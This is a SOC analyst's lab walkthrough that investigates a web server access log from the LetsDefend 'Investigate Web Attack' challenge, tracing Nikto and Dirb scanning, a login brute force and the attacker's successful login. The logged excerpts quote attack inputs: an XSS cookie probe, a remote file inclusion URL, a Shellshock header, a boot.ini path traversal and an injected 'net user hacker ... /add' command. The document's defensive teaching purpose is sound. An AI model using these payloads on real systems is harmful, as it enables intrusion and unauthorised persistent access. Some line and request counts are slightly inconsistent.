SOC Playbook: LetsDefend – Investigate Web Attack
If you are looking for a definitive LetsDefend Investigate Web Attack walkthrough, you are in the right place. As a SOC Analyst working through real-world scenarios, I recently completed the “Detecting Web Attacks” challenge on LetsDefend and built this guide to reflect how a modern SOC investigation should actually be performed.
This is not just about finding the correct answers to complete a lab, but about thinking and operating like a Security Operations Center professional handling a live incident. In a real SOC environment, web attack investigation requires structured triage, log analysis, threat identification, and clear decision-making under pressure. This walkthrough applies those same principles, showing how to analyze attacker behavior, identify patterns, and connect events across logs in a way that mirrors real incident response workflows.
What You Will Learn from This Walkthrough
Throughout this guide, you will see how common web attack techniques are investigated from a SOC perspective, including:
- Automated Reconnaissance: Spotting bot-driven scans and directory discovery.
- Brute Force Authentication: Identifying and mitigating credential stuffing or password spraying.
- Command Injection: Detecting attempts to execute arbitrary commands on the host OS.
The focus is not just on recognizing indicators, but on understanding why they matter and building an analytical mindset that goes beyond tools and signatures toward deeper behavioral analysis.
Whether you are an aspiring SOC Analyst or already working in a SOC role, this guide is designed to strengthen your ability to perform effective web attack investigations using a structured, real-world methodology.
Investigation Scope
In the following sections, I will begin investigating the web server log file access.log from the LetsDefend Investigate Web Attack challenge.
Questions Answered:
- Q1: Which automated scan tool did the attacker use for web reconnaissance?
- Q2: After web reconnaissance activity, which technique did the attacker use for directory listing discovery?
- Q3: What is the third attack type after directory listing discovery?
- Q4: Is the third attack successful?
- Q5: What is the name of the fourth attack?
- Q6: What is the first payload for the fourth attack?
- Q7: Is there any persistency clue for the victim machine in the log file? If yes, what is the related payload?
Before You Begin — Understanding the Log Format
Every line in an Apache/Nginx combined access log follows this fixed structure:
IP - - [TIMESTAMP] "METHOD ENDPOINT PROTOCOL" STATUS RESPONSE_SIZE "REFERER" "USER-AGENT"Example:
192.168.199.2 - - [20/Jun/2021:12:36:24 +0300] "GET /bwapp/ HTTP/1.1" 200 4086 "-" "Mozilla/5.00 (Nikto/2.1.6)"| awk Position | Field | Example value | What it tells you |
|---|---|---|---|
$1 | IP address | 192.168.199.2 | Source of the request — who made it |
$2 | Ident | - | RFC 1413 client identity — almost always -, not used |
$3 | Auth user | - | Authenticated username — - if no HTTP authentication |
$4 | Date/time | [20/Jun/2021:12:36:24 | Timestamp opening bracket — first half of the request time |
$5 | Timezone | +0300] | UTC offset — second half of the timestamp, closes the bracket |
$6 | Method | "GET | HTTP method — GET=reading, POST=submitting data (includes opening ") |
$7 | Endpoint | /bwapp/ | Requested URL path — may contain URL-encoded attack payloads |
$8 | Protocol | HTTP/1.1" | HTTP version — confirms protocol in use (includes closing ") |
$9 | Status code | 200 | Server response — 200=ok, 302=redirect, 403=forbidden, 404=not found |
$10 | Response Size | 4086 | Response size in bytes — - means no body; uniform value = same page served every time |
$11 | Referer | "-" | URL of the referring page in quotes — - if request was direct |
$12+ | User-Agent | "Mozilla/5.00 | Tool or browser making the request — field count varies when the UA string contains spaces; use awk -F'"' '{print $6}' for reliable extraction regardless of UA length |
View 2: The Secure Quote-Delimited Structure (The Enterprise Standard)
To securely extract fragile data like the User-Agent or the URL, SOC analysts use awk -F'"' to slice the log using double-quotes instead of spaces. This shifts the column numbers completely and creates secure “buckets” that never break.
| awk -F'”‘ Position | Field | Example value | What it securely isolates |
|---|---|---|---|
$1 | Pre-Request Block (IP & Time) | 192.168.199.2 - - [20/Jun/2021:12:36:24 +0300] | The IP, Timestamp, and formatting spaces before the first quote. |
$2 | HTTP Request Block | GET /bwapp/ HTTP/1.1 | The Full HTTP Request: Safely isolates the URL, even if the attacker injected spaces into the path. |
$3 | Response Block (Status & Size) | 200 4086 | The Status Code and Body Size. |
$4 | Referer | - | The Referer: Safely trapped inside the second set of quotes. |
$5 | Formatting Space | | The single blank space between the Referer and the User-Agent. |
$6 | User-Agent | Mozilla/5.00 (Nikto/2.1.6) | The Full User-Agent: Safely captures the entire tool signature, regardless of how many spaces it contains. |
Crucial Parsing Concepts: awk vs awk -F'”‘
- The Default
awkFlaw: By default,awkcuts log lines at every space. If an attacker injects spaces into a URL, or if a User-Agent contains spaces (e.g.,Mozilla/5.0 (Macintosh...), standardawkshatters the data across the wrong columns. - The
awk -F'"'Solution: Adding-F'"'forcesawkto cut the line only at double-quotes ("). This safely traps volatile data (like the HTTP Request in$2and the User-Agent in$6) into unbreakable buckets, regardless of how many spaces are inside them. - The
$5Formatting Space: Why is$5just a blank space? Apache logs put a physical space between fields for readability (e.g.,"-" "Mozilla..."). Whenawkcuts at the Referer’s closing quote and the User-Agent’s opening quote, that single formatting space gets trapped all by itself in bucket$5.
⚠️ The Limitation of Quote-Parsing
While-F'"'solves the space injection problem, attackers can still break it by injecting raw double-quotes (") directly into URLs. These injected quotes physically shatter the quote-delimited structure, causingawkto misread the fields. This is why Step 2B uses a structural regex method to detect and isolate these malformed payloads before you begin standard analysis.
PHASE 1 — SITUATIONAL AWARENESS
Know what you have before touching anything
STEP 1 — Establish the log size and incident time window
Why: Before any analysis, you need to understand the scope. Total line count determines how automated the attack was. The timestamp window tells you the total duration of malicious activity. This prevents drawing conclusions from incomplete data.
# Total number of entries in the log
wc -l access.log
# First and last full log lines — shows format and time boundary
head -1 access.log
tail -1 access.log
# Extract timestamps cleanly to see the window
head -1 access.log | awk '{print $4, $5}'
tail -1 access.log | awk '{print $4, $5}'What to look for:
- High line counts (5,000+) in a short time window indicate automated tooling
- Compare first vs last timestamp to determine incident duration
- The last log line is particularly important — it often contains the final attacker action
This log — confirmed results:
12556 access.log
First entry: [20/Jun/2021:12:35:40 +0300] (legitimate user browsing)
Last entry: [20/Jun/2021:12:53:23 +0300] (attacker's final injected command)
Total window: 17 minutes 43 secondsRecord: Total lines: _____ | First timestamp: _____ | Last timestamp: _____
STEP 2A — Confirm the log format and field positions
Why: Field positions in awk commands are zero-tolerance. If the log has extra fields or a non-standard format, every subsequent command extracting $6, $7, $9 will produce wrong output. You must verify format before proceeding.
# Visually inspect the first 3 lines
head -3 access.log
# Count fields in a representative line
head -1 access.log | awk '{print NF}'Expected for Apache Combined Log Format:
- Field count is typically 9 to 21+ (varies because URLs with spaces produce more fields)
- Field 4 always starts with
[(timestamp) - Field 6 is always the HTTP method inside quotes
- Field 9 is always the 3-digit HTTP status code
This log — confirmed results:
NF = 21
Format: Apache Combined Log Format — confirmedSTEP 2B — Validate log integrity and isolate malformed payloads
Why: Confirming the format in Step 2A is necessary but not sufficient. Relying on space-counted field positions assumes every line in the log is well-formed — but advanced attackers intentionally inject raw, unencoded double-quotes (") directly into URLs. These injected quotes physically shatter the column structure of the log line, causing standard awk positional commands to silently extract garbage data from the wrong fields. Before trusting any field extraction across the entire log, you must measure the structural health of the file and immediately surface the lines that break the parser. Those broken lines are not noise — they are almost always the most aggressive payloads in the dataset.
Part A — Format compliance check
Establish the exact number of lines that conform to the Apache Combined Log Format structure. This becomes your baseline. Any discrepancy between the total line count and the structural match count is your anomaly count.
# Total baseline line count
wc -l access.log
# Count lines that PERFECTLY match the Apache Combined Log Format structure
grep -Ec '^[^ ]+ [^ ]+ [^ ]+ \[[^]]+\] "[^"]*" [0-9]{3} [0-9-]+ "[^"]*" "[^"]*"' access.logUnderstanding the structural regex:
This pattern maps the exact physical blueprint of a combined log line. Instead of counting spaces, it anchors to delimiters — brackets and double-quotes — that the attacker cannot remove without breaking the HTTP request itself.
| Regex pattern | Field | How it works |
|---|---|---|
^[^ ]+ | IP address | Anchors to line start, reads until the first space |
[^ ]+ [^ ]+ | Ident & auth user | Steps over the two - placeholder fields |
\[[^]]+\] | Timestamp | Captures everything enclosed in literal [ and ] |
"[^"]*" | HTTP request line | Captures everything inside the first quote pair — an injected space inside the URL cannot break this because the anchor is the closing ", not a space |
[0-9]{3} | Status code | Requires exactly three consecutive digits |
[0-9-]+ | Body size | Matches a digit string or a literal - for empty responses |
"[^"]*" | Referer | Steps over the second quoted field |
"[^"]*" | User-Agent | Steps over the final quoted field |
How to interpret the comparison:
| Scenario | Meaning |
|---|---|
| Both counts identical | Log is structurally clean — all positional awk commands are safe |
| grep count slightly lower | Anomaly detected — the gap is the number of malformed lines that failed the structural check |
| grep returns 0 | Non-standard format (WAF log, JSON, custom format) — positional awk will fail entirely, dynamic anchoring required |
This log — confirmed results:
Total Lines: 12556
Matched Lines: 12457
Discrepancy: 99 malformed lines detectedPart B — Isolate the malformed requests
Once a discrepancy is confirmed, immediately extract the lines that failed the structural check. These lines are invisible to standard positional awk parsers and represent the attacker’s most aggressive payload types.
# Extract every line that breaks the Apache Combined Log Format structure
grep -Ev '^[^ ]+ [^ ]+ [^ ]+ \[[^]]+\] "[^"]*" [0-9]{3} [0-9-]+ "[^"]*" "[^"]*"' access.log
# Count the malformed lines and compare against the discrepancy from Part A
grep -Ev '^[^ ]+ [^ ]+ [^ ]+ \[[^]]+\] "[^"]*" [0-9]{3} [0-9-]+ "[^"]*" "[^"]*"' access.log | wc -lNote on the count: The inverted grep returns 100 lines while the arithmetic discrepancy (12556 − 12457) is **99**. The one-line gap is expected — a single line may be structurally ambiguous enough to be counted differently by the two operations. Both numbers are real. The malformed line count is 100; the compliance check delta is 99. Neither indicates an error.
Observed Evidence (sample of malformed lines):
192.168.199.2 ... "GET /bwapp/emailfriend/emailnews.php?id=\"<script>alert(document.cookie)</script> HTTP/1.1" 404 300 ...
192.168.199.2 ... "GET /bwapp/forum.asp?n=/.\"./.\"./.\"./.\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver]... HTTP/1.1" 400 326 ...
192.168.199.2 ... "GET /bwapp/index.php?config[\"sipssys\"]=http://cirt.net/rfiinc.txt? HTTP/1.1" 302 - ...
(97 additional malformed lines)What this means for the rest of the investigation:
These 100 lines exist inside access.log and they are not lost, they simply cannot be parsed by space-delimited awk commands. All subsequent steps in this playbook use grep against the raw log or extract fields by anchoring to structural delimiters (-F'"'), which remain reliable even against these payloads. The positional awk commands ($7, $9, $10) are valid for the 12,456 well-formed lines.
PHASE 2 — IDENTIFY THE ATTACKER
Separate malicious traffic from legitimate traffic
STEP 3 — Extract all unique source IPs with request counts
Why: Volume anomaly is the primary indicator of automated attack traffic. Legitimate browser sessions generate 10–50 requests as they load page assets. Scanners and brute force tools generate hundreds to thousands per minute. This single command separates the attacker from background noise.
# All source IPs with total request count, highest first
awk '{print $1}' access.log | sort | uniq -c | sort -rnDecision thresholds:
| Request Count | Assessment |
|---|---|
| < 100 | Normal browser session |
| 100 – 1,000 | Suspicious — possible light scanning |
| 1,000 – 10,000 | Automated tooling — very likely attacker |
| > 10,000 | Confirmed high-volume automation |
This log — confirmed results:
12528 192.168.199.2 <-- ATTACKER (99.77% of all 12,556 entries)
29 192.168.199.1 <-- Legitimate user (browser loading page assets)Record your attacker IP: 192.168.199.2
STEP 4 — Visually confirm attacker identity by sampling their traffic
Why: High volume is necessary but not sufficient to confirm malicious intent. You must visually inspect a sample to confirm the traffic is anomalous before labeling this IP as the attacker and building all further analysis around that assumption.
# First 20 requests — reveals initial tool and behavior
grep "192.168.199.2" access.log | head -20
# Last 20 requests — reveals final actions and potential persistence
grep "192.168.199.2" access.log | tail -20
# Total count confirmation
grep "192.168.199.2" access.log | wc -lSigns of malicious automated traffic in the sample:
- Tool names visible in the User-Agent field (Nikto, Dirb, sqlmap, etc.)
- Requests to non-existent paths (404 responses) in rapid sequence
- Random-looking filenames:
4RaXX5Ac.exe,4RaXX5Ac.conf— these are Nikto’s file extension probe strings - Multiple requests at the exact same second — impossible by human typing
This log — confirmed results:
First 20: All Nikto/2.1.6 with test IDs like (Test:Port Check), (Test:map_codes)
Probing random extensions: .exe, .show, .java, .x-shop, .bat|dir
Predominantly 404 responses
Last 20: Brute force login attempts followed by OS command injections
Final line contains: system('net user hacker Asd123!! /add')
Total: 12528 — confirmed matchesSTEP 5 — Isolate all attacker traffic into a dedicated working file
Why: Filtering all subsequent analysis to attacker-only traffic eliminates noise from legitimate users and makes every command faster and cleaner. This is a mandatory step — do not skip it. All remaining steps in this playbook operate on attacker_traffic.log.
# Create the attacker-specific working file
grep "192.168.199.2" access.log > attacker_traffic.log
# Verify line count matches Step 3 and Step 4 counts exactly
wc -l attacker_traffic.log
# Confirm the attacker's own time window
head -1 attacker_traffic.log | awk '{print $4}'
tail -1 attacker_traffic.log | awk '{print $4}'Validation check: The line count from wc -l attacker_traffic.log must equal the count from grep "192.168.199.2" access.log | wc -l. If they differ, the file creation failed — run the grep command again.
This log — confirmed results:
12528 attacker_traffic.log (matches — file created correctly)
Attacker window: 12:36:24 → 12:53:23PHASE 3 — FINGERPRINT THE ATTACK TOOLS
Every tool leaves a User-Agent signature — this phase answers Q1 and Q2
STEP 6 — Extract ALL unique User-Agent strings from attacker traffic
Why: This is the single most critical command in the entire playbook. Every automated attack tool injects a distinctive User-Agent into every request. The number of meaningfully distinct User-Agents equals the number of distinct attack phases. One command hands you the complete attack phase map before you analyze anything else.
Why -F'"' and field $6: The log stores request fields inside double quotes. When awk splits on " as the field delimiter, the resulting fields are: $1=first part, $2=HTTP request line, $3=status/response block, $4=referer value, $5=space, $6=User-Agent value. This $6 position is fixed regardless of URL length or the number of spaces in the URL.
Important — User-Agent strings can be spoofed: User-Agent values are set by the client and can be freely modified by any tool or attacker. They provide a strong initial signal for tool identification, but must never be used as the sole basis for definitive attribution. Always validate User-Agent-based identification through behavioral evidence: request patterns, response codes, endpoint distribution, and request timing. The UA narrows your hypothesis — behavior confirms it.
# Produces the complete global UA landscape including legitimate traffic
awk -F'"' '{print $6}' access.log | sort | uniq -c | sort -nr# IP + UA correlation with tool variants collapsed — run against the raw log
awk -F'"' '{split($1, a, " "); print a[1], $6}' access.log | sed 's/ (Evasions.*//' | sort | uniq -c | sort -nrWhy both queries are needed: The first gives the full unfiltered inventory — every UA variant visible, no information discarded. The second solves the two limitations of the first: it binds each UA to its source IP, and it collapses Nikto’s per-test variants into a single line with a combined count. Together they answer two distinct questions — what tools exist in the log, and which IP used which tool.
This log — confirmed results from the IP + UA correlation query:
7303 192.168.199.2 Mozilla/5.00 (Nikto/2.1.6) → Nikto (Phase 1)
4816 192.168.199.2 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) → Dirb (Phase 2)
174 192.168.199.2 Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/... Firefox/52.0 → Attacker browser (Phase 3+)
101 192.168.199.2 - → Nikto null-UA evasion
61 192.168.199.2 () { :; }; echo Nikto-Added-CVE-2014-6271: true;... → Nikto shellshock probe
56 192.168.199.2 (empty) → Nikto empty-UA evasion
29 192.168.199.1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0)... → Legitimate user
13 192.168.199.2 ./.\\\ → Nikto path traversal test
3 192.168.199.2 )</script> HTTP/1.1 → Nikto XSS test
1 192.168.199.2 (log parsing artifact)What this output tells you before any further analysis:
192.168.199.1appears once with a legitimate macOS browser UA — confirmed as the benign user192.168.199.2accounts for every other line — confirmed as the attacker- The attacker used three meaningfully distinct tools: Nikto, Dirb, and their own browser
- The three tool phases are already visible, counted, and attributed to a single IP in one pass
awk -F'"' '{split($1, a, " "); print a[1], $6}' attacker_traffic.log | sed 's/ (Evasions.*//' | sort | uniq -c | sort -nr# Focused UA extraction — attacker traffic only, full per-variant detail
awk -F'"' '{print $6}' attacker_traffic.log | sort | uniq -c | sort -rnKnown tool signatures and what they mean:
| User-Agent Pattern | Tool | Phase | Attack Type |
|---|---|---|---|
Nikto/2.x.x | Nikto | Phase 1 | Web vulnerability scanner (Q1 answer) |
MSIE 6.0; Windows NT 5.1 | Dirb | Phase 2 | Directory brute force — Dirb’s known default UA |
Mozilla/5.0 (X11; Linux...) | Attacker’s own browser | Phase 3+ | Manual exploitation |
sqlmap/x.x | sqlmap | Any | SQL injection |
python-requests/x.x | Custom script | Any | Custom automation |
() { :; }; echo Nikto-Added-CVE-... | Nikto shellshock probe | Phase 1 | CVE-2014-6271 exploitation attempt |
This log — attacker-only UA breakdown (top entries from attacker_traffic.log):
4816 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) → Dirb
234 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:sitefiles) → Nikto (one variant of many)
221 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:map_codes) → Nikto
174 Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/...Firefox/52.0 → Attacker browser
101 - (null UA — Nikto requests sent without UA header)
61 () { :; }; echo Nikto-Added-CVE-2014-6271: true;... → Nikto shellshock
56 (empty string — more Nikto evasion variants)
26 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:004729) → Nikto (individual test)
13 ./.\\\ (Nikto path traversal evasion test)
(... many more Nikto per-test lines follow)Three distinct phases identified:
- Phase 1: Multiple Nikto User-Agent variants (7,303 total when collapsed)
- Phase 2:
MSIE 6.0 / Windows NT 5.1— Dirb’s known default (4,816 requests) - Phase 3+:
Firefox/52.0 on Linux— attacker’s own browser, manual exploitation (174 requests)
STEP 7 — Verify and confirm Nikto as the reconnaissance tool — Q1
Why: Nikto explicitly embeds its name in the User-Agent. However, verification through behavior is required to be confident. Confirming that Nikto’s requests follow the expected pattern — probing for CVEs, testing file extensions, checking known dangerous paths — validates the identification beyond just UA matching.
# Total Nikto request volume
grep "Nikto" attacker_traffic.log | wc -l
# Sample of paths Nikto tested
grep "Nikto" attacker_traffic.log | awk '{print $7}' | head -20
# Response code distribution — shows what Nikto found vs what was missing
grep "Nikto" attacker_traffic.log | awk '{print $9}' | sort | uniq -c | sort -rn
# Nikto phase start and end timestamps
grep "Nikto" attacker_traffic.log | head -1 | awk '{print $4}'
grep "Nikto" attacker_traffic.log | tail -1 | awk '{print $4}'Behavioral signatures that confirm Nikto:
- Test ID annotations in UA:
(Test:Port Check),(Test:map_codes),(Test:sitefiles),(Test:002857)— these are Nikto’s internal test catalog references - Random 8-character strings with multiple extensions:
4RaXX5Ac.exe,4RaXX5Ac.conf— Nikto’s extension enumeration probes - Shellshock probe in UA field:
() { :; }; echo Nikto-Added-CVE-2014-6271— Nikto’s Bash shellshock test - Requests to known vuln paths:
/_vti_pvt/,/phpinfo.php,/cgi-bin/,/.htaccess
This log — confirmed results:
7455 total Nikto requests
Start: [20/Jun/2021:12:36:24
End: [20/Jun/2021:12:36:57 (33 seconds duration)Why this count (7,455) differs from the 7,303 shown in Step 6:
Step 6’s IP + UA correlation query uses awk -F'"' to extract the User-Agent and sed to group them by the standard Mozilla/5.00 (Nikto/2.1.6) signature. The resulting 7,303 figure is an accurate count of that specific signature, but it undercounts the total Nikto traffic by approximately 152 requests.
This gap is comprised of two distinct Nikto evasion categories:
- Structurally Malformed Lines: As identified in Step 2B, the attacker injected raw double-quotes into the URLs (e.g.,
\"<script>), shattering the log’s column structure. On these lines, the textNiktolands outside of the$6User-Agent bucket, rendering them invisible to the positionalawkquery. - Shellshock Probes (61 lines): These lines were structurally intact and captured perfectly by
awk, but Nikto replaces its standard User-Agent header with the exploit payload() { :; }; echo Nikto-Added-CVE-2014-6271: true;.... Because they lack the standardMozillaprefix, thesedcollapse command isolates them into their own bucket of 61 rather than aggregating them into the main 7,303 count.
Command-Line Proof — Isolating the Malformed Lines (The Fast Way):
A healthy Apache Combined Log line contains exactly 6 double-quotes, meaning awk -F'"' will always split it into exactly 7 fields. Any line where the Number of Fields (NF) does not equal 7 has been structurally broken by injected quotes. You can verify the Nikto evasion payloads cleanly with this logic:
# 1. How many malformed lines contain the Nikto signature?
awk -F'"' 'NF!=7' access.log | grep -i "Nikto" | wc -l
# Output: 90
# 2. Show the rest of the malformed lines (Injection tests lacking the Nikto string)
awk -F'"' 'NF!=7' access.log | grep -vi "Nikto"
# 3. Show all 100 malformed lines together
awk -F'"' 'NF!=7' access.logQ1 ANSWER: nikto
STEP 8 — Verify Dirb as the directory discovery tool — Q2
Why: The MSIE 6.0 / Windows NT 5.1 string is Dirb’s known default User-Agent. No legitimate Internet Explorer 6 traffic has existed on any network since approximately 2008. Its presence in the log is a strong initial indicator for Dirb or similar directory brute-force tools such as Gobuster. Because User-Agent strings are modifiable, tool identity must be confirmed through behavior — not the UA string alone. The combination of high request volume against wordlist-style paths with predominantly 404 responses is the definitive behavioral confirmation.
# Total MSIE 6.0 request volume
grep "MSIE 6.0" attacker_traffic.log | wc -l
# Sample of paths targeted — should show wordlist patterns
grep "MSIE 6.0" attacker_traffic.log | awk '{print $7}' | head -30
# Response code distribution — 404-dominant confirms wordlist scanning
grep "MSIE 6.0" attacker_traffic.log | awk '{print $9}' | sort | uniq -c | sort -rn
# Phase timestamps
grep "MSIE 6.0" attacker_traffic.log | head -1 | awk '{print $4}'
grep "MSIE 6.0" attacker_traffic.log | tail -1 | awk '{print $4}'
# Verify the 12-second duration by counting requests per second
grep "MSIE 6.0" attacker_traffic.log | awk '{print $4}' | sort | uniq -c
# View the chronological flow of Dirb requests (Time, Method, Path, Status)
# (Pipe to 'head -30' or 'less' to view the stream comfortably)
grep "MSIE 6.0" attacker_traffic.log | awk '{print $4, $6, $7, $9}' | head -30Three-condition behavioral confirmation for directory brute-force:
| Condition | Expected | Interpretation if true |
|---|---|---|
| 1. High volume | 1,000+ requests | Automated wordlist tool |
| 2. Path variety | Common directory names, numeric paths | Wordlist enumeration |
| 3. 404-dominant | 80%+ returning 404 | Probing for things that don’t exist |
All three must be true to confirm directory brute-force activity. User-Agent alone is insufficient — behavior seals the determination.
This log — confirmed results:
4816 total MSIE 6.0 requests
Sample paths: /bwapp/admin/2013, /bwapp/admin/2014, /bwapp/admin/21
/bwapp/administrators (numeric and alphabetic wordlist mix)
Response codes: Predominantly 404 — tool probing for non-existent paths
Start timestamp: [20/Jun/2021:12:37:50
End timestamp: [20/Jun/2021:12:38:02Q2 ANSWER: directory brute force
PHASE 4 — BUILD THE ATTACK TIMELINE
Every phase needs a timestamp boundary — this is the investigation spine
STEP 9 — Establish precise start and end timestamps for every phase
Why: Timestamps are the connective tissue of the entire investigation. Without exact phase boundaries you cannot sequence attacks correctly, calculate gaps, or determine which activity belongs to which phase. The gap between phases reveals attacker decision time — how long they paused to review results before launching the next stage.
# PHASE 1 — Nikto
grep "Nikto" attacker_traffic.log | head -1 | awk '{print $4, $5}'
grep "Nikto" attacker_traffic.log | tail -1 | awk '{print $4, $5}'
# PHASE 2 — Dirb
grep "MSIE 6.0" attacker_traffic.log | head -1 | awk '{print $4, $5}'
grep "MSIE 6.0" attacker_traffic.log | tail -1 | awk '{print $4, $5}'
# PHASE 3+ — Attacker's own browser (Firefox/52.0)
grep "Firefox/52.0" attacker_traffic.log | head -1 | awk '{print $4, $5}'
grep "Firefox/52.0" attacker_traffic.log | tail -1 | awk '{print $4, $5}'This log — confirmed timeline:
Phase 1 Nikto Start: 12:36:24 End: 12:36:57 Duration: 33 seconds
Phase 2 Dirb Start: 12:37:50 End: 12:38:02 Duration: ~12 seconds
[GAP] 12:38:02 → 12:41:34 Duration: 3 min 32 sec
Phase 3+ Firefox Start: 12:41:34 End: 12:53:23 Duration: 11 min 49 secInterpreting the 3 min 32 sec gap:
The attacker stopped all automated tooling after Dirb finished and went quiet for over three minutes. This is the attacker manually reviewing Dirb’s output, identifying the login page (/bWAPP/login.php), and setting up their next tool. A gap of this length after enumeration indicates a skilled, methodical operator — not a script running on autopilot.
STEP 10 — Construct the complete timeline table
Fill this in before proceeding. This table is your roadmap for all remaining analysis:
PHASE TOOL UA FINGERPRINT START END DURATION
------ ----------- ----------------------- -------- -------- ----------
Phase 1 Nikto Nikto/2.1.6 12:36:24 12:36:57 33 seconds
Phase 2 Dirb MSIE 6.0 / Windows NT 12:37:50 12:38:02 ~12 seconds
[ATTACKER ANALYSIS GAP] 12:38:02 12:41:34 3.5 minutes
Phase 3 Unknown Firefox/52.0 Linux 12:41:34 12:49:35 ~8 minutes
Phase 4 Unknown Firefox/52.0 Linux 12:50:15 12:53:23 ~3 minutesPhases 3 and 4 share the same User-Agent because they are both manual operations by the attacker using their own browser. They are distinguished by target endpoint and behavior, not by tool change.
PHASE 5 — IDENTIFY THE THIRD ATTACK TYPE
Profile Phase 3 to answer Q3
STEP 11 — Isolate Phase 3 and Phase 4 traffic into a dedicated file
Why: You need a clean, isolated view of the manual phase activity, free from Nikto and Dirb noise. All injection and brute force analysis from this point targets this file.
# Isolate all manual-phase traffic (Firefox/52.0 UA)
grep "Firefox/52.0" attacker_traffic.log > phase3_traffic.log
# Confirm line count
wc -l phase3_traffic.log
# View complete Phase 3+ activity in chronological order
awk '{print $4, $6, $7, $9, $10}' phase3_traffic.logThis log — confirmed results:
174 lines in phase3_traffic.logSTEP 12 — Identify HTTP methods used in the manual phase
Why: HTTP method is the highest-signal behavioral indicator at this stage. Switching from the GET-dominant scanning of Phases 1 and 2 to heavy POST activity on a specific endpoint is a direct indicator of credential-based attack. The method ratio shapes your initial hypothesis.
# Method distribution for the entire manual phase
awk '{print $6}' phase3_traffic.log | sort | uniq -cInterpretation framework:
| Method Pattern | Likely Attack Type |
|---|---|
| GET-dominant with varied endpoints | Browsing or manual recon |
| POST-dominant against one endpoint | Brute force or form injection |
| GET with long URL parameters | Code/command injection via URL |
| Mixed POST heavy early, GET with params late | Brute force then post-login injection |
This log — confirmed results:
39 "GET (browsing: page loading, asset requests, navigation)
135 "POST (dominant — data submission to server)135 POST requests vs 39 GET requests. The dominant action is submitting data. This rules out passive recon and points directly toward active exploitation.
STEP 13 — Map all endpoints targeted in the manual phase
Why: Endpoint concentration is the definitive differentiator between attack types. A brute force attack drills one single endpoint repeatedly. A scanner distributes requests across hundreds of different paths. The distribution shape identifies the attack type.
# All method + endpoint combinations with counts, sorted by volume
awk '{print $6, $7}' phase3_traffic.log | sort | uniq -c | sort -rnReading the distribution:
| Concentration | Attack Type |
|---|---|
| Single endpoint > 70% of traffic | Brute force — intense repetition on one target |
| Hundreds of paths mostly 404 | Directory/file brute force |
| One endpoint, varying parameters | Parameter injection |
| Spread across many authenticated pages | Post-login manual exploration |
This log — confirmed results:
134 "POST /bWAPP/login.php ← 77% of ALL 174 Phase 3 requests — one endpoint
2 "GET /bWAPP/portal.php
2 "GET /bWAPP/phpi.php?message=test
2 "GET ...phpi.php?message=...(encoded commands)
1 "POST /bWAPP/portal.php
(remaining 33: image/CSS/JS assets loaded when navigating the portal)134 of 174 requests — 77% — concentrated on a single endpoint. This is the unmistakable shape of brute force.
STEP 14 — Confirm the brute force pattern through response code and body size analysis
Why: The server’s HTTP responses are ground truth. For login brute force the pattern is specific and inescapable: hundreds of identical failure responses followed by one success response with a completely different code and body. The body size column is the clearest evidence because it proves every one of those 132 responses was the same login-failure page.
# Response code distribution for all login POST requests
grep "POST /bWAPP/login.php" attacker_traffic.log | awk '{print $9}' | sort | uniq -c
# Response CODE + BODY SIZE together — the definitive brute force fingerprint
grep "POST /bWAPP/login.php" attacker_traffic.log | awk '{print $9, $10}' | sort | uniq -c
# Total login attempt count
grep "POST /bWAPP/login.php" attacker_traffic.log | wc -l
# Timing of attempts — proves automation (human cannot type at this speed)
grep "POST /bWAPP/login.php" attacker_traffic.log | awk '{print $4}' | head -15HTTP response reference for login pages:
| Code | Body | Meaning |
|---|---|---|
| 200 | Uniform size repeated | Failed login — same page returned every time |
| 302 | - (no body) | Successful login — server redirected to authenticated area |
| 403 | Present | IP or account blocked |
| 429 | Present | Rate limit triggered |
This log — confirmed results:
132 200 4086 ← 132 failed logins: identical login-failure page (4086 bytes) every time
2 302 - ← 2 successful logins: redirect with no body = credentials found
Total: 134 attempts
Timing sample:
12:44:xx → 12:45:xx → 12:46:xx (regular ~4-5 second intervals = automated tool)The 4086 pattern explained: The number 4086 is the exact byte size of the login-failure HTML page. When login fails, the server renders the same form with the same error message — same HTML, same size, every time. The fact that this number appears 132 times with zero variation mathematically proves every one of those attempts received an identical failed-login response.
Q3 ANSWER: Brute force
PHASE 6 — CONFIRM WHETHER THE BRUTE FORCE SUCCEEDED
Answer Q4
STEP 15 — Isolate successful authentication events
Why: Whether the attack succeeded changes everything about the incident response. A failed attack requires detection tuning. A successful one requires active containment. The HTTP 302 redirect on a login endpoint is the server’s way of saying “credentials accepted, go here now.”
# Isolate ONLY the successful login redirects
grep "POST /bWAPP/login.php" attacker_traffic.log | grep " 302 "
# Count how many successful logins occurred
grep "POST /bWAPP/login.php" attacker_traffic.log | grep " 302 " | wc -l
# Exact timestamp of first successful login
grep "POST /bWAPP/login.php" attacker_traffic.log | grep " 302 " | head -1 | awk '{print $4, $5}'This log — confirmed results:
192.168.199.2 - - [20/Jun/2021:12:49:35 +0300] "POST /bWAPP/login.php HTTP/1.1" 302 - ... Firefox/52.0
192.168.199.2 - - [20/Jun/2021:12:50:10 +0300] "POST /bWAPP/login.php HTTP/1.1" 302 - ... Firefox/52.0
2 successful logins
First breach timestamp: 12:49:35STEP 16 — Confirm authenticated access was established (post-login navigation)
Why: A 302 on a login page is strong evidence of success, but you must also verify the attacker reached and loaded the authenticated area. If portal.php returned HTTP 200 with a full body, the attacker is definitively inside the application.
# What did the attacker load immediately after the 302 redirect?
grep "Firefox/52.0" attacker_traffic.log | grep -A5 "POST /bWAPP/login.php.*302"
# Did the attacker reach the authenticated portal?
grep "Firefox/52.0" attacker_traffic.log | grep "portal.php"This log — confirmed results:
12:49:35 POST /bWAPP/login.php 302 - (success — redirect issued)
12:50:10 POST /bWAPP/login.php 302 - (second successful login)
12:50:10 GET /bWAPP/portal.php 200 23369 (authenticated portal loaded — 23,369 bytes)
12:50:15 POST /bWAPP/portal.php 302 23369 (navigating within authenticated area)
12:50:15 GET /bWAPP/phpi.php 200 12735 (selected vulnerable page from portal menu)The portal returned HTTP 200 with 23,369 bytes — a full page load, not an error or redirect. The attacker is inside.
Q4 ANSWER: Yes
